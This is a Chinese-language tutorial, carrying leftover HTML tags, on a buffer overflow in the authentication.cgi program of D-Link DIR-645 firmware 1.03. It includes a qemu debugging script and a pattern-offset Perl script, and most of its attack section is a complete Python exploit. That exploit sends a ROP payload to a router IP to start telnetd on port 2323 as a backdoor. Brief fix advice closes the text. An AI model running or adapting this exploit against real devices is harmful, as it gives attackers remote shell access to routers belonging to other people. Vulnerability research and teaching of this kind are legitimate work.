D-Link DIR-645路由器溢出分析与利用教学文档<\/h1>

1. 漏洞概述<\/h2>
本教学文档详细分析D-Link DIR-645路由器固件版本1.03中的缓冲区溢出漏洞。该漏洞存在于`authentication.cgi<\/code>程序中，当处理POST请求时，由于对输入数据长度缺乏有效验证，导致攻击者可以通过构造恶意请求实现远程代码执行。<\/p>`

2. 环境准备<\/h2>
2.1 所需工具<\/h3>

IDA Pro：用于逆向分析<\/li>
qemu-mipsel：用于MIPS架构仿真<\/li>
pattern.pl：用于生成和定位溢出偏移<\/li>
Python：用于编写漏洞利用脚本<\/li>
<\/ul>
2.2 固件获取<\/h3>
固件下载地址：<\/p>
ftp:\/\/ftp2.dlink.com\/PRODUCTS\/DIR-645\/REVA\/DIR-645_FIRMWARE_1.03.ZIP
<\/code><\/pre>
3. 漏洞分析<\/h2>
3.1 漏洞定位<\/h3>
漏洞存在于authentication.cgi<\/code>程序中，具体在read()<\/code>函数调用处：<\/p>
read(fileno(stdin), var_430, atoi(getenv("CONTENT_LENGTH"<\/span>)))
<\/span><\/span><\/code><\/pre>其中：<\/p>

var_430<\/code>是栈上的缓冲区<\/li>
CONTENT_LENGTH<\/code>环境变量控制读取长度<\/li>
缺乏对输入长度的有效验证<\/li>
<\/ul>
3.2 触发条件<\/h3>
POST请求必须满足特定格式才能触发漏洞：<\/p>
id=XX&password=XX
<\/code><\/pre>
3.3 调试方法<\/h3>
使用qemu进行调试的脚本run_cgi.sh<\/code>：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>INPUT=<\/span>"<\/span>$1"<\/span>  # 参数1,如uid=A21G&password=1160个A<\/span>
<\/span><\/span>TEST=<\/span>"<\/span>$2"<\/span>   # 参数2,如uid=A21G<\/span>
<\/span><\/span>LEN=<\/span>$(<\/span>echo -n "<\/span>$INPUT"<\/span> | wc -c)<\/span>
<\/span><\/span>PORT=<\/span>"1234"<\/span>
<\/span><\/span>
<\/span><\/span>cp $(<\/span>which qemu-mipsel-static)<\/span> .\/qemu
<\/span><\/span>echo "<\/span>$INPUT"<\/span> | chroot . .\/qemu -E CONTENT_LENGTH=<\/span>$LEN \
<\/span><\/span><\/span><\/span>    -E CONTENT_TYPE=<\/span>"application\/x-www-form-urlencoded"<\/span> \
<\/span><\/span><\/span><\/span>    -E REQUEST_METHOD=<\/span>"POST"<\/span> \
<\/span><\/span><\/span><\/span>    -E REQUEST_URI=<\/span>"\/authentication.cgi"<\/span> \
<\/span><\/span><\/span><\/span>    -E REMOTE_ADDR=<\/span>"127.0.0.1"<\/span> \
<\/span><\/span><\/span><\/span>    -g $PORT \/htdocs\/web\/authentication.cgi
<\/span><\/span>rm -f .\/qemu
<\/span><\/span><\/code><\/pre>4. 漏洞利用<\/h2>
4.1 偏移量确定<\/h3>
使用pattern.pl<\/code>脚本生成测试字符串并确定偏移量：<\/p>
#!\/usr\/bin\/perl -w<\/span>
<\/span><\/span>use<\/span> strict;
<\/span><\/span>
<\/span><\/span># 生成指定长度的模式字符串<\/span>
<\/span><\/span>my<\/span> $ustart =<\/span> 65<\/span>; my<\/span> $uend =<\/span> 90<\/span>;    # A-Z<\/span>
<\/span><\/span>my<\/span> $lstart =<\/span> 97<\/span>; my<\/span> $lend =<\/span> 122<\/span>;   # a-z<\/span>
<\/span><\/span>my<\/span> $nstart =<\/span> 0<\/span>; my<\/span> $nend =<\/span> 9<\/span>;      # 0-9<\/span>
<\/span><\/span>my<\/span> $length =<\/span> $ARGV[0<\/span>];
<\/span><\/span>my<\/span> $string =<\/span> ""<\/span>;
<\/span><\/span>
<\/span><\/span># 生成模式字符串的逻辑<\/span>
<\/span><\/span>sub<\/span> generate<\/span> {
<\/span><\/span>    for<\/span>(my<\/span> $upper =<\/span> $ustart; $upper <=<\/span> $uend; $upper++<\/span>) {
<\/span><\/span>        $string .=<\/span> chr($upper);
<\/span><\/span>        return<\/span> if<\/span> length($string) ==<\/span> $length;
<\/span><\/span>        
<\/span><\/span>        for<\/span>(my<\/span> $lower =<\/span> $lstart; $lower <=<\/span> $lend; $lower++<\/span>) {
<\/span><\/span>            $string .=<\/span> chr($lower);
<\/span><\/span>            return<\/span> if<\/span> length($string) ==<\/span> $length;
<\/span><\/span>            
<\/span><\/span>            for<\/span>(my<\/span> $num =<\/span> $nstart; $num <=<\/span> $nend; $num++<\/span>) {
<\/span><\/span>                $string .=<\/span> $num;
<\/span><\/span>                return<\/span> if<\/span> length($string) ==<\/span> $length;
<\/span><\/span>                
<\/span><\/span>                $string .=<\/span> chr($upper);
<\/span><\/span>                return<\/span> if<\/span> length($string) ==<\/span> $length;
<\/span><\/span>                
<\/span><\/span>                if<\/span>($num !=<\/span> $nend) {
<\/span><\/span>                    $string .=<\/span> chr($lower);
<\/span><\/span>                    return<\/span> if<\/span> length($string) ==<\/span> $length;
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>generate();
<\/span><\/span>print<\/span> $string;
<\/span><\/span><\/code><\/pre>使用方法：<\/p>
.\/pattern.pl 1160<\/span> > test_auth
<\/span><\/span><\/code><\/pre>4.2 ROP链构造<\/h3>
关键ROP地址（基于libc基址0x2aaf8000）：<\/p>
target =<\/span> {
<\/span><\/span>    "1.03"<\/span> : [
<\/span><\/span>        0x531ff<\/span>,  # 伪system函数地址(实际地址-1)<\/span>
<\/span><\/span>        0x158c8<\/span>,  # rop chain 1(将伪地址+1)<\/span>
<\/span><\/span>        0x159cc<\/span>,  # rop chain 2(执行system函数)<\/span>
<\/span><\/span>    ],
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.3 完整利用代码<\/h3>
import<\/span> sys
<\/span><\/span>import<\/span> urllib,<\/span> urllib2,<\/span> httplib
<\/span><\/span>
<\/span><\/span>class<\/span> MIPSPayload<\/span>:
<\/span><\/span>    BADBYTES =<\/span> [0x00<\/span>]
<\/span><\/span>    LITTLE =<\/span> "little"<\/span>
<\/span><\/span>    BIG =<\/span> "big"<\/span>
<\/span><\/span>    FILLER =<\/span> "A"<\/span>
<\/span><\/span>    BYTES =<\/span> 4<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> __init__(self, libase=<\/span>0<\/span>, endianess=<\/span>LITTLE, badbytes=<\/span>BADBYTES):
<\/span><\/span>        self.<\/span>libase =<\/span> libase
<\/span><\/span>        self.<\/span>shellcode =<\/span> ""<\/span>
<\/span><\/span>        self.<\/span>endianess =<\/span> endianess
<\/span><\/span>        self.<\/span>badbytes =<\/span> badbytes
<\/span><\/span>    
<\/span><\/span>    def<\/span> rand_text<\/span>(self, size):
<\/span><\/span>        chars =<\/span> 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'<\/span>
<\/span><\/span>        return<\/span> ''<\/span>.<\/span>join(random.<\/span>choice(chars) for<\/span> _ in<\/span> range(size))
<\/span><\/span>    
<\/span><\/span>    def<\/span> Add<\/span>(self, data):
<\/span><\/span>        self.<\/span>shellcode +=<\/span> data
<\/span><\/span>    
<\/span><\/span>    def<\/span> Address<\/span>(self, offset, base=<\/span>None<\/span>):
<\/span><\/span>        if<\/span> base is<\/span> None<\/span>: base =<\/span> self.<\/span>libase
<\/span><\/span>        return<\/span> self.<\/span>ToString(base +<\/span> offset)
<\/span><\/span>    
<\/span><\/span>    def<\/span> AddAddress<\/span>(self, offset, base=<\/span>None<\/span>):
<\/span><\/span>        self.<\/span>Add(self.<\/span>Address(offset, base))
<\/span><\/span>    
<\/span><\/span>    def<\/span> AddBuffer<\/span>(self, size, byte=<\/span>FILLER):
<\/span><\/span>        self.<\/span>Add(byte *<\/span> size)
<\/span><\/span>    
<\/span><\/span>    def<\/span> AddNops<\/span>(self, size):
<\/span><\/span>        self.<\/span>Add(self.<\/span>rand_text(size))
<\/span><\/span>    
<\/span><\/span>    def<\/span> ToString<\/span>(self, value, size=<\/span>BYTES):
<\/span><\/span>        data =<\/span> ""<\/span>
<\/span><\/span>        for<\/span> i in<\/span> range(0<\/span>, size):
<\/span><\/span>            data +=<\/span> chr((value >><\/span> (8<\/span>*<\/span>i)) &<\/span> 0xFF<\/span>)
<\/span><\/span>        if<\/span> self.<\/span>endianess !=<\/span> self.<\/span>LITTLE:
<\/span><\/span>            data =<\/span> data[::-<\/span>1<\/span>]
<\/span><\/span>        return<\/span> data
<\/span><\/span>    
<\/span><\/span>    def<\/span> Build<\/span>(self):
<\/span><\/span>        for<\/span> i, c in<\/span> enumerate(self.<\/span>shellcode):
<\/span><\/span>            for<\/span> byte in<\/span> self.<\/span>badbytes:
<\/span><\/span>                if<\/span> ord(c) ==<\/span> byte:
<\/span><\/span>                    raise<\/span> Exception<\/span>("Bad byte at offset <\/span>%d<\/span>: 0x<\/span>%.2X<\/span>"<\/span> %<\/span> (i, byte))
<\/span><\/span>        return<\/span> self.<\/span>shellcode
<\/span><\/span>
<\/span><\/span>class<\/span> HTTP<\/span>:
<\/span><\/span>    def<\/span> __init__(self, host, proto=<\/span>'http'<\/span>, verbose=<\/span>False<\/span>):
<\/span><\/span>        self.<\/span>host =<\/span> host
<\/span><\/span>        self.<\/span>proto =<\/span> proto
<\/span><\/span>        self.<\/span>verbose =<\/span> verbose
<\/span><\/span>    
<\/span><\/span>    def<\/span> Encode<\/span>(self, data):
<\/span><\/span>        if<\/span> type(data) ==<\/span> dict:
<\/span><\/span>            return<\/span> data['password'<\/span>] +<\/span> '&'<\/span> +<\/span> data['uid'<\/span>]
<\/span><\/span>        return<\/span> urllib.<\/span>quote_plus(data)
<\/span><\/span>    
<\/span><\/span>    def<\/span> Send<\/span>(self, uri, headers=<\/span>{}, data=<\/span>None<\/span>, encode_params=<\/span>True<\/span>):
<\/span><\/span>        if<\/span> data is<\/span> not<\/span> None<\/span>:
<\/span><\/span>            data =<\/span> self.<\/span>Encode(data)
<\/span><\/span>        
<\/span><\/span>        httpcli =<\/span> httplib.<\/span>HTTPConnection(self.<\/span>host, 80<\/span>, timeout=<\/span>30<\/span>)
<\/span><\/span>        httpcli.<\/span>request('POST'<\/span>, uri, data, headers=<\/span>headers)
<\/span><\/span>        return<\/span> httpcli.<\/span>getresponse()
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    libc =<\/span> 0x2aaf8000<\/span>  # libc基址<\/span>
<\/span><\/span>    target =<\/span> {
<\/span><\/span>        "1.03"<\/span> : [
<\/span><\/span>            0x531ff<\/span>,  # 伪system地址<\/span>
<\/span><\/span>            0x158c8<\/span>,  # ROP链1<\/span>
<\/span><\/span>            0x159cc<\/span>,  # ROP链2<\/span>
<\/span><\/span>        ],
<\/span><\/span>    }
<\/span><\/span>    v =<\/span> '1.03'<\/span>
<\/span><\/span>    cmd =<\/span> 'telnetd -p 2323'<\/span>  # 要执行的命令<\/span>
<\/span><\/span>    ip =<\/span> '192.168.0.1'<\/span>      # 目标IP<\/span>
<\/span><\/span>    
<\/span><\/span>    # 构造payload<\/span>
<\/span><\/span>    payload =<\/span> MIPSPayload(endianess=<\/span>"little"<\/span>, badbytes=<\/span>[0x0d<\/span>, 0x0a<\/span>])
<\/span><\/span>    payload.<\/span>AddNops(1011<\/span>)    # 填充1011字节<\/span>
<\/span><\/span>    payload.<\/span>AddAddress(target[v][0<\/span>], base=<\/span>libc)  # $s0<\/span>
<\/span><\/span>    payload.<\/span>AddNops(4<\/span>)       # $s1<\/span>
<\/span><\/span>    payload.<\/span>AddNops(4<\/span>)       # $s2<\/span>
<\/span><\/span>    payload.<\/span>AddNops(4<\/span>)       # $s3<\/span>
<\/span><\/span>    payload.<\/span>AddNops(4<\/span>)       # $s4<\/span>
<\/span><\/span>    payload.<\/span>AddAddress(target[v][2<\/span>], base=<\/span>libc)  # $s5<\/span>
<\/span><\/span>    payload.<\/span>AddNops(4<\/span>)       # $s6<\/span>
<\/span><\/span>    payload.<\/span>AddNops(4<\/span>)       # $s7<\/span>
<\/span><\/span>    payload.<\/span>AddNops(4<\/span>)       # $fp<\/span>
<\/span><\/span>    payload.<\/span>AddAddress(target[v][1<\/span>], base=<\/span>libc)  # $ra<\/span>
<\/span><\/span>    payload.<\/span>AddNops(16<\/span>)      # 填充<\/span>
<\/span><\/span>    payload.<\/span>Add(cmd)         # 要执行的命令<\/span>
<\/span><\/span>    
<\/span><\/span>    # 构造HTTP请求<\/span>
<\/span><\/span>    pdata =<\/span> {
<\/span><\/span>        'uid'<\/span>: '3Ad4'<\/span>,
<\/span><\/span>        'password'<\/span>: 'AbC'<\/span> +<\/span> payload.<\/span>Build(),
<\/span><\/span>    }
<\/span><\/span>    header =<\/span> {
<\/span><\/span>        'Cookie'<\/span>: 'uid=3Ad4'<\/span>,
<\/span><\/span>        'Content-Type'<\/span>: 'application\/x-www-form-urlencoded'<\/span>,
<\/span><\/span>        'User-Agent'<\/span>: 'Mozilla\/4.0'<\/span>
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    # 发送攻击请求<\/span>
<\/span><\/span>    try<\/span>:
<\/span><\/span>        HTTP(ip).<\/span>Send('authentication.cgi'<\/span>, data=<\/span>pdata, headers=<\/span>header)
<\/span><\/span>        print '[+] Exploit succeeded'<\/span>
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        print '[-] Exploit failed:'<\/span>, str(e)
<\/span><\/span><\/code><\/pre>5. 仿真环境搭建<\/h2>
5.1 启动qemu系统<\/h3>
sudo qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta \
<\/span><\/span><\/span><\/span>    -hda debian_squeeze_mipsel_standard.qcow2 \
<\/span><\/span><\/span><\/span>    -append "root=\/dev\/sda1 console=tty0"<\/span> -net nic -net tap -nographic
<\/span><\/span><\/code><\/pre>5.2 准备固件环境<\/h3>

将固件文件系统复制到仿真环境中<\/li>
挂载必要的目录：<\/li>
<\/ol>
mount -o bind \/dev .\/squashfs-root\/dev
<\/span><\/span>mount -t proc \/proc .\/squashfs-root\/proc\/
<\/span><\/span>chroot .\/squashfs-root\/ sh
<\/span><\/span><\/code><\/pre>
启动服务：<\/li>
<\/ol>
cd \/etc\/init.d\/
<\/span><\/span>.\/rcS
<\/span><\/span><\/code><\/pre>6. 漏洞修复建议<\/h2>

对CONTENT_LENGTH<\/code>进行严格验证<\/li>
对输入数据进行长度检查<\/li>
更新到最新固件版本<\/li>
使用地址空间布局随机化(ASLR)等防护措施<\/li>
<\/ol>
7. 总结<\/h2>
本漏洞利用的关键点：<\/p>

通过构造超长password参数触发缓冲区溢出<\/li>
精心构造ROP链绕过保护机制<\/li>
利用libc中的gadget实现代码执行<\/li>
通过telnetd开启后门端口实现持久化访问<\/li>
<\/ol>
通过本教学文档，读者可以全面了解D-Link DIR-645路由器的漏洞分析方法和利用技术，并掌握MIPS架构下的漏洞利用技巧。<\/p>